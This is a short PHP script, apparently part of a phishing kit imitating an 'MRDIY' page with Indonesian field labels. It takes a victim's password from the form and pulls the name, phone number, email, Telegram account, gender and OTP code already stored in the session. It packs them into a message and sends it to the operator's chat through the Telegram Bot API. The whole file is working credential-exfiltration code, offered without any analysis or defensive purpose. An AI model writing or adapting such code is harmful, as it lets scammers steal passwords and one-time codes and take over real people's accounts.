<?php
include '../mailman.php';
session_start();
$password = $_POST['password'];
$name                 = $_SESSION['name'];
$phone                 = $_SESSION['phone'];
$email                = $_SESSION['email'];
$telegram                 = $_SESSION['telegram'];
$gender                 = $_SESSION['gender'];
$_otp                 = $_SESSION['_otp'];
$_SESSION['password'] = $password;


$message = "

MRDIY | NoHP ".$b."

• Nama Lengkap : ".$name."
• Nomor Handphone  : ".$phone."
• Email : ".$email."
• Akun : ".$telegram."
• Gender : ".$gender."
• Kode OTP : ".$_otp."
• Passwd : ".$password."
";

function sendMessage($telegram_id, $message, $id_bot) {
    $url = "https://api.telegram.org/bot" . $id_bot . "/sendMessage?parse_mode=markdown&chat_id=" . $telegram_id;
    $url = $url . "&text=" . urlencode($message);
    $ch = curl_init();
    $optArray = array(
        CURLOPT_URL => $url,
        CURLOPT_RETURNTRANSFER => true
    );
    curl_setopt_array($ch, $optArray);
    $result = curl_exec($ch);
    curl_close($ch);
}

sendMessage($telegram_id, $message, $id_bot);
?>
